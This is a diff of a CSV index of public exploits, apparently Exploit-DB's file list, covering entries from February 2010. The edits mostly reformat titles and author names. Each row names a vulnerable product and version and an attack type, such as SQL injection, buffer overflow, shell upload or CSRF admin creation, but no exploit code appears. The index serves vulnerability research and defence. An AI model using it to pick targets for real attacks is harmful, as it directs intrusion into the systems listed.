IWMS <= 7 SQL Injection & Cross Site Scripting",2010-02-09,cp77fk4r,asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 Local Buffer Overflow Exploit (0day)",2010-02-09,"fl0 fl0w",windows,local,0 -11374,platforms/windows/dos/11374.pl,"WM Downloader v3.0.0.9 PLS PLA‏ WMDownloader (PoC)",2010-02-09,jiko,windows,dos,0 +11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JiKo,windows,dos,0 11375,platforms/php/webapps/11375.txt,"Zomorrod Cms Sql Injection Vulnerability",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script Remote File Disclosure Vulnerability",2010-02-09,jiko,php,webapps,0 -11377,platforms/php/webapps/11377.txt,"Limny v1.01 Remote File Upload Vulnerability",2010-02-09,jiko,php,webapps,0 +11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload Vulnerability",2010-02-09,JiKo,php,webapps,0 11378,platforms/php/webapps/11378.txt,"Newsletter Tailor v0.2.0 RFI Vulnerability",2010-02-09,Snakespc,php,webapps,0 -11379,platforms/windows/local/11379.c,"feedDemon v3.1.0.9 opml File Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 -11380,platforms/php/webapps/11380.txt,"osTicket v1.6 RC5 Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 +11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 +11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 11382,platforms/php/webapps/11382.txt,"eSmile Script (index.php) SQL Injection Vulnerability",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps,0 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions Multiple SQL Injection Vulnerabilities",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps,0 -11384,platforms/windows/local/11384.py,"WM Downloader v3.0.0.9 PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0 -11385,platforms/php/webapps/11385.txt,"ULoki Community Forum v2.1 (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0 +11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0 +11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0 11391,platforms/windows/dos/11391.py,"Open and Compact FTPd Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0 -11392,platforms/windows/dos/11392.c,"Radasm v2.2.1.6 .rap file Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 +11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap ) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 11393,platforms/jsp/webapps/11393.txt,"Omnidocs SQL injection Vulnerability",2010-02-11,thebluegenius,jsp,webapps,0 -11394,platforms/php/webapps/11394.txt,"vBulletin v3.5.2 XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 +11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 11396,platforms/php/webapps/11396.txt,"vBulletin v 2.3 .* SQL Injection Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/webapps/11397.txt,"PHP Captcha Security Images DoS Vulnerability",2010-02-11,cp77fk4r,php,webapps,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload Vulnerability",2010-02-11,jiko,php,webapps,0 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook <= 2.0.4 Database Backup Dump Vulnerability",2010-02-11,ViRuSMaN,php,webapps,0 -11400,platforms/windows/local/11400.py,"Radasm v2.2.1.6 (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 +11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 XSS, Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 -11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro v4.0.13 SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 +11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 11405,platforms/multiple/webapps/11405.txt,"RSA SecurID XSS Vulnerability",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) Database Disclosure Vulnerability",2010-02-11,Phenom,windows,webapps,80 11407,platforms/windows/dos/11407.txt,"Core Impact 7.5 Denial of Service Vulnerability",2010-02-11,"Beenu Arora",windows,dos,80 @@ -10450,13 +10450,13 @@ id,file,description,date,author,platform,type,port 11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script SQL Injection Vulnerability",2010-02-11,JaMbA,multiple,webapps,80 11410,platforms/php/webapps/11410.txt,"Vacation Rental Script SQL Injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 11411,platforms/php/webapps/11411.txt,"apemCMS SQL Injection Vulnerability",2010-02-11,Ariko-Security,php,webapps,0 -11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 +11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 11413,platforms/windows/local/11413.pl,"CastRipper 2.50.70 (.asx) Playlist Stack Overflow Exploit",2010-02-12,"Jordi Chancel",windows,local,0 -11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor.v7.1 Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 +11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 11415,platforms/php/webapps/11415.txt,"Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability",2010-02-12,cr4wl3r,php,webapps,0 -11416,platforms/php/webapps/11416.txt,"Alqatari Group Version 1.0 Blind SQL Injection Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0 +11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0 11420,platforms/windows/remote/11420.py,"Open & Compact FTPd Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0 -11422,platforms/windows/remote/11422.rb,"Hyleos ChemView v1.9.5.1 ActiveX Control Buffer Overflow Exploit (meta)",2010-02-12,Dz_attacker,windows,remote,0 +11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow Exploit (meta)",2010-02-12,Dz_attacker,windows,remote,0 11424,platforms/php/webapps/11424.txt,"CMS Made Simple 1.6.6 Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 11425,platforms/php/webapps/11425.txt,"daChooch Remote Sql Injection Vulnerability",2010-02-12,Snakespc,php,webapps,0 11426,platforms/multiple/dos/11426.txt,"Browser address bar characters into a small feature",2010-02-12,"Pouya Daneshmand",multiple,dos,0 @@ -10470,7 +10470,7 @@ id,file,description,date,author,platform,type,port 11437,platforms/php/webapps/11437.txt,"ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities",2010-02-13,ViRuSMaN,php,webapps,0 11438,platforms/windows/dos/11438.txt,"Internet Explorer 8 (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh Kumar Mani Tripathi",windows,dos,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 -11441,platforms/php/webapps/11441.txt,"WordPress >= 2.9 Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 +11441,platforms/php/webapps/11441.txt,"WordPress => 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion Vulnerability",2010-02-14,eidelweiss,php,webapps,0 11443,platforms/php/webapps/11443.txt,"Calendarix v0.8.20071118 SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS SQLi 1.2.0 (Last Version of 11/02/2010) and ALL < version",2010-02-14,Thibow,php,webapps,0 @@ -10478,84 +10478,84 @@ id,file,description,date,author,platform,type,port 11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery Remote Sql Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla (Jw_allVideos) Remote File Download Vulnerability",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote Sql Injection Vulnerability",2010-02-14,Snakespc,php,webapps,0 -11450,platforms/php/webapps/11450.txt,"File Upload Manager v1.3 exploit",2010-02-14,ROOT_EGY,php,webapps,0 +11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 (.mp3) Local Denial of Service (DoS) #",2010-02-14,Mr.tro0oqy,windows,dos,0 -11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 +11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 -11455,platforms/php/webapps/11455.txt,"Généré par KDPics v1.18 Remote Add Admin",2010-02-15,Snakespc,php,webapps,0 +11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,Snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit",2010-02-15,"Sioma Labs",windows,remote,0 11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog SQL injection",2010-02-15,kaMtiEz,php,webapps,0 -11460,platforms/php/webapps/11460.txt,"Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability",2010-02-15,"indoushka ",php,webapps,0 -11461,platforms/php/webapps/11461.txt,"CoffieNet CMS By Pass Admin Vulnerability",2010-02-15,"indoushka ",php,webapps,0 -11462,platforms/php/webapps/11462.txt,"blog ink Bypass Setting Vulnerability",2010-02-15,"indoushka ",php,webapps,0 +11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (By pass) Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 +11461,platforms/php/webapps/11461.txt,"CoffieNet CMS By Pass Admin Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 +11462,platforms/php/webapps/11462.txt,"blog ink Bypass Setting Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 11463,platforms/php/webapps/11463.txt,"Joomla Component com_joomportfolio Blind Injection Vulnerability",2010-02-15,Snakespc,php,webapps,0 11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare Sql Injection Vulnerability",2010-02-15,Snakespc,php,webapps,0 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit",2010-02-15,_SuBz3r0_,windows,local,0 11466,platforms/php/webapps/11466.txt,"microUpload Shell Upload Vulnerability",2010-02-15,Phenom,php,webapps,0 -11467,platforms/hardware/dos/11467.py,"Apple Iphone/Ipod - My DBLite Edition Remote 0day DOS Exploit",2010-02-15,"Jason Bowes",hardware,dos,0 -11468,platforms/windows/remote/11468.py,"Easy~Ftp Server v1.7.0.2 Post-Authentication BoF",2010-02-15,dookie,windows,remote,21 -11469,platforms/windows/dos/11469.py,"Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 -11470,platforms/windows/dos/11470.py,"Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (PoC)",2010-02-15,loneferret,windows,dos,0 -11472,platforms/hardware/dos/11472.py,"Apple Iphone/Ipod - FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,hardware,dos,0 +11467,platforms/hardware/dos/11467.py,"iOS My DBLite Edition - Remote 0day DOS Exploit",2010-02-15,"Jason Bowes",hardware,dos,0 +11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF",2010-02-15,dookie,windows,remote,21 +11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 +11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (PoC)",2010-02-15,loneferret,windows,dos,0 +11472,platforms/hardware/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,hardware,dos,0 11473,platforms/php/webapps/11473.txt,"Pogodny CMS SQL Injection Vulnerability",2010-02-16,Ariko-Security,php,webapps,0 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews [id] SQL Injection Vulnerability",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 -11475,platforms/windows/local/11475.txt,"OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit",2010-02-16,mr_me,windows,local,0 -11476,platforms/php/webapps/11476.txt,"SongForever.com Clone Shell Upload Vulnerability",2010-02-16,indoushka,php,webapps,0 -11477,platforms/php/webapps/11477.txt,"Limny v2.0 Change Email and Password CSRF Exploit",2010-02-16,"Luis Santana",php,webapps,0 -11478,platforms/php/webapps/11478.txt,"Limny v2.0 Create Admin User CSRF Exploit",2010-02-16,"Luis Santana",php,webapps,0 +11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - (.olf) Universal Buffer Overflow Exploit",2010-02-16,mr_me,windows,local,0 +11476,platforms/php/webapps/11476.txt,"SongForever.com Clone Shell Upload Vulnerability",2010-02-16,"indoushka salah el ddine",php,webapps,0 +11477,platforms/php/webapps/11477.txt,"Limny 2.0 Change Email and Password - CSRF Exploit",2010-02-16,"Luis Santana",php,webapps,0 +11478,platforms/php/webapps/11478.txt,"Limny 2.0 - Create Admin User CSRF Exploit",2010-02-16,"Luis Santana",php,webapps,0 11479,platforms/php/webapps/11479.txt,"Joomla Component com_acstartseite Sql Injection Vulnerability",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11480,platforms/php/webapps/11480.txt,"Joomla Component com_acprojects Sql Injection Vulnerability",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps,0 11481,platforms/php/webapps/11481.txt,"intuitive (form.php) Sql Injection Vulnerability",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps,0 11482,platforms/php/webapps/11482.txt,"Nabernet (articles.php) Sql Injection Vulnerability",2010-02-17,AtT4CKxT3rR0r1ST,php,webapps,0 11483,platforms/php/webapps/11483.txt,"Joomla Component com_acteammember SQL Injection Vulnerability",2010-02-17,altbta,php,webapps,0 11484,platforms/php/webapps/11484.txt,"uGround <= 1.0b SQL Injection Vulnerability",2010-02-17,"Easy Laster",php,webapps,0 -11485,platforms/php/webapps/11485.txt,"Multiple File Attachments Mail Form Pro v2 - WebShell upload",2010-02-17,EgoPL,php,webapps,0 +11485,platforms/php/webapps/11485.txt,"Multiple File Attachments Mail Form Pro 2.0 - WebShell upload",2010-02-17,EgoPL,php,webapps,0 11486,platforms/php/webapps/11486.txt,"PHPIDS 0.4 - Remote File Inclusion Vulnerability",2010-02-17,eidelweiss,php,webapps,0 11487,platforms/php/webapps/11487.txt,"Auktionshaus v.4 news.php SQL Injection Vulnerability",2010-02-17,"Easy Laster",php,webapps,0 11488,platforms/php/webapps/11488.txt,"Auktionshaus Gelb v.3 news.php SQL Injection Vulnerability",2010-02-17,"Easy Laster",php,webapps,0 11489,platforms/php/webapps/11489.txt,"Erotik Auktionshaus news.php SQL Injection Vulnerability",2010-02-17,"Easy Laster",php,webapps,0 -11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability",2010-02-17,Metropolis,php,webapps,0 +11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire <= 0.4 - Blind SQL Injection Vulnerability",2010-02-17,Metropolis,php,webapps,0 11491,platforms/multiple/local/11491.rb,"iTunes 9.0.1 .pls File Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0 -11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner v22.0.0.5 ActiveX Control DoS (Stack overflow)",2010-02-18,wirebonder,windows,dos,0 +11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control DoS (Stack overflow)",2010-02-18,wirebonder,windows,dos,0 11494,platforms/php/webapps/11494.txt,"Joomla Component com_otzivi Local File Inclusion Vulnerability",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0 11495,platforms/php/webapps/11495.txt,"CubeCart (index.php) SQL Injection Vulnerability",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0 -11496,platforms/php/webapps/11496.txt,"Open Source Classifieds v1.1.0 Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0 -11497,platforms/linux/remote/11497.txt,"gitWeb v1.5.2 Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 +11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0 +11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 11498,platforms/php/webapps/11498.txt,"Joomla Plugin Core Design Scriptegrator Local File Inclusion Vulnerability",2010-02-18,"S2 Crew",php,webapps,0 -11499,platforms/hardware/dos/11499.pl,"FileApp v1.7 for iPhone/iPod Remote DoS Exploit",2010-02-18,Ale46,hardware,dos,0 -11500,platforms/windows/remote/11500.py,"Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0 +11499,platforms/hardware/dos/11499.pl,"iOS FileApp 1.7 - Remote DoS Exploit",2010-02-18,Ale46,hardware,dos,0 +11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote BoF Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0 11502,platforms/php/webapps/11502.txt,"phpAutoVideo CSRF Vulnerability",2010-02-19,GoLdeN-z3r0,php,webapps,0 -11503,platforms/php/webapps/11503.txt,"Litespeed Web Server v4.0.12 (Add Admin) CSRF and XSS Vulnerabilities",2010-02-19,d1dn0t,php,webapps,0 -11504,platforms/php/webapps/11504.txt,"SQL injection vulnerability in Amelia CMS",2010-02-19,Ariko-Security,php,webapps,0 +11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities",2010-02-19,d1dn0t,php,webapps,0 +11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL injection vulnerability",2010-02-19,Ariko-Security,php,webapps,0 11507,platforms/php/webapps/11507.txt,"WSC CMS (Bypass) SQL Injection Vulnerability",2010-02-19,Phenom,php,webapps,0 11508,platforms/php/webapps/11508.txt,"Trixbox PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0 -11509,platforms/php/webapps/11509.txt,"Phpkit v1.6.1 Multiple SQL Injection Vulnerabilities",2010-02-19,"Easy Laster",php,webapps,0 +11509,platforms/php/webapps/11509.txt,"Phpkit 1.6.1 - Multiple SQL Injection Vulnerabilities",2010-02-19,"Easy Laster",php,webapps,0 11511,platforms/php/webapps/11511.txt,"Joomla Component com_communitypolls LFI Vulnerability",2010-02-19,kaMtiEz,php,webapps,0 11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure Vulnerability",2010-02-20,ViRuSMaN,php,webapps,0 11516,platforms/php/webapps/11516.html,"TimeClock CSRF Remote Add Admin Exploit",2010-02-20,ViRuSMaN,php,webapps,0 11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure Vulnerability",2010-02-20,ViRuSMaN,php,webapps,0 11518,platforms/php/webapps/11518.txt,"Softbiz Jobs (news_desc) SQL Injection Vulnerability",2010-02-22,Baybora,php,webapps,0 -11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery v1.0 Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 -11520,platforms/hardware/dos/11520.pl,"iFTPStorage v1.2 for Iphone\Ipod - Remote Dos Exploit",2010-02-22,Ale46,hardware,dos,0 -11521,platforms/php/webapps/11521.txt,"Ero Auktion v2.0 (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 -11522,platforms/php/webapps/11522.txt,"Ero Auktion v2010 (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 -11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France Multi Vulnerability",2010-02-22,indoushka,php,webapps,0 -11524,platforms/php/webapps/11524.txt,"Arab Cart Version v1.0.2.0 Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 -11526,platforms/php/webapps/11526.txt,"vBSEO v3.1.0 Local File Inclusion Vulnerability",2010-02-22,ViRuSMaN,php,webapps,0 +11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0 +11520,platforms/hardware/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,hardware,dos,0 +11521,platforms/php/webapps/11521.txt,"Ero Auktion 2.0 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 +11522,platforms/php/webapps/11522.txt,"Ero Auktion 2010 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 +11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France Multi Vulnerability",2010-02-22,"indoushka salah el ddine",php,webapps,0 +11524,platforms/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0 +11526,platforms/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion Vulnerability",2010-02-22,ViRuSMaN,php,webapps,0 11527,platforms/multiple/webapps/11527.html,"cPanel Multiple CSRF Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps,0 -11528,platforms/php/webapps/11528.txt,"phpBugTracker v1.0.1 File Disclosure Vulnerability",2010-02-22,ViRuSMaN,php,webapps,0 +11528,platforms/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure Vulnerability",2010-02-22,ViRuSMaN,php,webapps,0 11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11530,platforms/php/webapps/11530.txt,"Article Friendly SQL Injection Vulnerability",2010-02-22,SkuLL-HacKeR,php,webapps,0 11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit",2010-02-22,cr4wl3r,windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 (Browser) IE Denial of Service Exploit",2010-02-22,cr4wl3r,windows,dos,0 -11533,platforms/windows/dos/11533.pl,"Nero Burning ROM v9.4.13.2 (iso compilation) Local Buffer Invasion PoC",2010-02-22,LiquidWorm,windows,dos,0 +11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion PoC",2010-02-22,LiquidWorm,windows,dos,0 11534,platforms/windows/dos/11534.pl,"VKPlayer 1.0 (.mid) Denial of Service Exploit",2010-02-22,cr4wl3r,windows,dos,0 -11535,platforms/windows/dos/11535.pl,"Media Player Classic v6.4.9.1 (.avi) Buffer Overflow Exploit",2010-02-22,cr4wl3r,windows,dos,0 -11536,platforms/windows/dos/11536.pl,"GOM Player v2.1.21.4846 (.wav) Buffer Overflow Exploit",2010-02-22,cr4wl3r,windows,dos,0 -11537,platforms/windows/dos/11537.pl,"Chasys Media Player v1.1 (.mid) Local Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 -11539,platforms/windows/remote/11539.py,"Easy FTP Server v1.7.0.2 CWD Remote BoF",2010-02-22,athleet,windows,remote,0 -11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player v1.31 (.wav) Local Crash Exploit",2010-02-22,v3n0m,windows,dos,0 +11535,platforms/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - (.avi) Buffer Overflow Exploit",2010-02-22,cr4wl3r,windows,dos,0 +11536,platforms/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - (.wav) Buffer Overflow Exploit",2010-02-22,cr4wl3r,windows,dos,0 +11537,platforms/windows/dos/11537.pl,"Chasys Media Player 1.1 (.mid) - Local Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 +11539,platforms/windows/remote/11539.py,"Easy FTP Server 1.7.0.2 - CWD Remote BoF",2010-02-22,athleet,windows,remote,0 +11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player 1.31 - (.wav) Local Crash Exploit",2010-02-22,v3n0m,windows,dos,0 11541,platforms/windows/dos/11541.pl,"E.M. Total Video Player 1.31 (.avi) Local Crash PoC",2010-02-22,diving,windows,dos,0 11543,platforms/php/webapps/11543.txt,"Softbiz Jobs CSRF Vulnerability",2010-02-23,"Pratul Agrawal",php,webapps,0 11544,platforms/php/webapps/11544.php,"Joomla Component com_ice Blind SQL Injection Vulnerability",2010-02-23,Snakespc,php,webapps,0 @@ -10565,46 +10565,46 @@ id,file,description,date,author,platform,type,port 11549,platforms/php/webapps/11549.pl,"Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability",2010-02-23,Snakespc,php,webapps,0 11550,platforms/php/webapps/11550.txt,"worksimple_1.3.2 Multiple Remote Vulnerabilities",2010-02-23,JIKO,php,webapps,0 11551,platforms/php/webapps/11551.txt,"Softbiz Jobs Multiple SQL Injection Vulnerabilities",2010-02-23,"Easy Laster",php,webapps,0 -11552,platforms/hardware/dos/11552.pl,"iPhone FtpDisc v1.0 Denial of Service",2010-02-23,Ale46,hardware,dos,0 +11552,platforms/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,hardware,dos,0 11553,platforms/php/webapps/11553.txt,"Tinypug v0.9.5 CSRF Password Change",2010-02-23,"AmnPardaz ",php,webapps,0 11554,platforms/php/webapps/11554.txt,"QuickDev 4 Php Database Disclosure Vulnerability",2010-02-23,ViRuSMaN,php,webapps,0 11555,platforms/asp/webapps/11555.txt,"bispage Bypass Vulnerability",2010-02-23,SaMir-BonD,asp,webapps,0 11556,platforms/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang Remote DoS Exploit",2010-02-23,Ale46,hardware,dos,0 -11557,platforms/php/webapps/11557.txt,"Max's Photo Album Shell Upload Vulnerability",2010-02-24,indoushka,php,webapps,0 -11558,platforms/php/webapps/11558.txt,"MySmartBB v1.0.0 Cross Site Scripting Vulnerability",2010-02-24,indoushka,php,webapps,0 +11557,platforms/php/webapps/11557.txt,"Max's Photo Album Shell Upload Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 +11558,platforms/php/webapps/11558.txt,"MySmartBB 1.0.0 - Cross Site Scripting Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 11559,platforms/php/webapps/11559.txt,"Article Friendly CSRF Vulnerability",2010-02-24,"Pratul Agrawal",php,webapps,0 -11560,platforms/php/webapps/11560.txt,"WikyBlog v1.7.3rc2 Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 -11561,platforms/multiple/local/11561.html,"Mozilla Firefox v3.6 URL Spoofing Vulnerability",2010-02-24,Unknown,multiple,local,0 +11560,platforms/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,"indoushka salah el ddine",php,webapps,0 +11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing Vulnerability",2010-02-24,unknown,multiple,local,0 11563,platforms/php/webapps/11563.txt,"kalimat new system v 1.0 (index.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 -11564,platforms/php/webapps/11564.txt,"ShortCMS v1.11F(B) (con) SQL Injection Vulnerability",2010-02-24,Gamoscu,php,webapps,0 